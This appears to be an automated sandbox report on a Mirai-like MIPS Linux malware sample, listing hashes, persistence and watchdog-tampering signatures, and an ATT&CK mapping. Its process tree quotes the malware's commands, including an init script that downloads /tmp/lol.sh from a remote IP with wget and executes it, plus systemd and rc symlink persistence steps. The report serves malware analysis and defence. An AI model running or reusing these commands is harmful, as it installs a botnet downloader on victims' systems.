Analysis
-
max time kernel
58s -
max time network
133s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/11/2024, 08:51
Static task
static1
Behavioral task
behavioral1
Sample
f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf
Resource
debian9-mipsel-20240611-en
General
-
Target
f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf
-
Size
134KB
-
MD5
2fcff406e1f57e00d98b987d23cd398f
-
SHA1
7675a391d83a38868d5f9194a9c7248291e1705a
-
SHA256
f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067
-
SHA512
6003c40f6af2626ab5fcf6fc381e4e27abb624111d8e297d24b2110d78134ade98cc702e0fe3c556b65900b9a03efbde16e53395280bdbf395b9d936c19227de
-
SSDEEP
1536:tLXuqtWr4N9zWJPEceN7U9empeIwOdzZXz8EmbycedlGcYx3dZ3aHXzy+LwCvnqX:puqtWr4DItmecedlotFU3vnqln
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 741 sh 743 sh 747 chmod -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf File opened for modification /dev/misc/watchdog f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc Process File opened for modification /etc/profile f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf -
description ioc Process File opened for modification /etc/init.d/sh sh File opened for modification /etc/init.d/mybinary f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf -
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/custom.service f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf -
Modifies Bash startup script 2 TTPs 1 IoCs
description ioc Process File opened for modification /etc/profile f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /var/iamnewgorilla 703 f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/1/cgroup f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems mkdir File opened for reading /proc/self/status f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf
Processes
-
/tmp/f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf/tmp/f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf1⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Modifies init.d
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
- Reads runtime system information
PID:703 -
/bin/shsh -c "systemctl enable custom.service >/dev/null 2>&1"2⤵PID:706
-
/bin/systemctlsystemctl enable custom.service3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:715
-
-
-
/bin/shsh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"2⤵PID:740
-
-
/bin/shsh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://87.120.84.247/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"2⤵
- File and Directory Permissions Modification
- Modifies init.d
PID:741
-
-
/bin/shsh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
PID:743 -
/bin/chmodchmod +x /etc/init.d/sh3⤵
- File and Directory Permissions Modification
PID:747
-
-
-
/bin/shsh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"2⤵PID:758
-
/bin/mkdirmkdir -p /etc/rc.d3⤵
- Reads runtime system information
PID:760
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
110B
MD52a3758c7be4b51e45514ca71272a2241
SHA116f6c47091d87086ae361ee9653af0bbb3f0afb7
SHA25605e88586f84b6ddddd894580aa50f2b066be6520174c497e5957860e07f51ea7
SHA512246177d06d5c8d2444663c4d4828f3be8ca640123b6f0934add6953aa9b54e12e7114912644503fd598aa57dedd5a4392e14e136ce2c628899ed1f607a2b77ee
-
Filesize
97B
MD50680c195fdd2fca0a0e632cf637d150e
SHA17ded21dcbe33cfde13db634f159b7748b28b61c1
SHA2561d1be04cff45dde0d7a8a6e60e5c6e65312108a926d235892a04b0b2ce6cf38d
SHA512fad47bb194885f9e6b7875e99f4469807eb1aaac0fa7d04b647420bce466a1eb422320eafa59e180bdbd4c69414f671138fb60bdd87403a414f0624d678e497f
-
Filesize
354B
MD5064ba5f4b09e62ca552b70a2e94d6393
SHA17076e742aa5e9757e555091c4a72206018115518
SHA256038696b3a44f62a700ee8e6187eef48c8e817068900363d4e527b14899fc22a1
SHA5125488263037dd93ae9daa23e987a2c4016ad4f241d3d318abfbba4d19bf67fa7e1084bf09f03ab07580df49a3b8ac45767e6cbc03cf7e71afff5adb942ef42eb9
-
Filesize
102B
MD5e5e2c6d263b0ee1c9c19d46192ad5cdf
SHA13197ca0f3394eedd2c4702cb6eaf7a22817d5fef
SHA256436aed8a5a70ab60873b71384b840ddcb839185208bd3bddb2b6a627e053a548
SHA512bd5e7113e820c1771eeedac572c16201bcc490b820d5d18323f03dfa7e263e14f1bacbf5923a24daac0db1f9789ace29682307464e098f72820655537b6c2786
-
Filesize
291B
MD5a31178fddb5564754ff49f0865dd2b20
SHA1f0b205696a09245229469d0ac1809135be57a837
SHA256d6f5a8734ff982cb1d46c25cad29fe1d09421ec31d364c507766a41cb775878d
SHA5127e2e400c9b70d54c7f4c196e8cf7970d4510577ab2777ab7694cb254445a68128256d10750e156681fdab7f35469f0efd9632ddc5432fb078ebf6f57da382a9d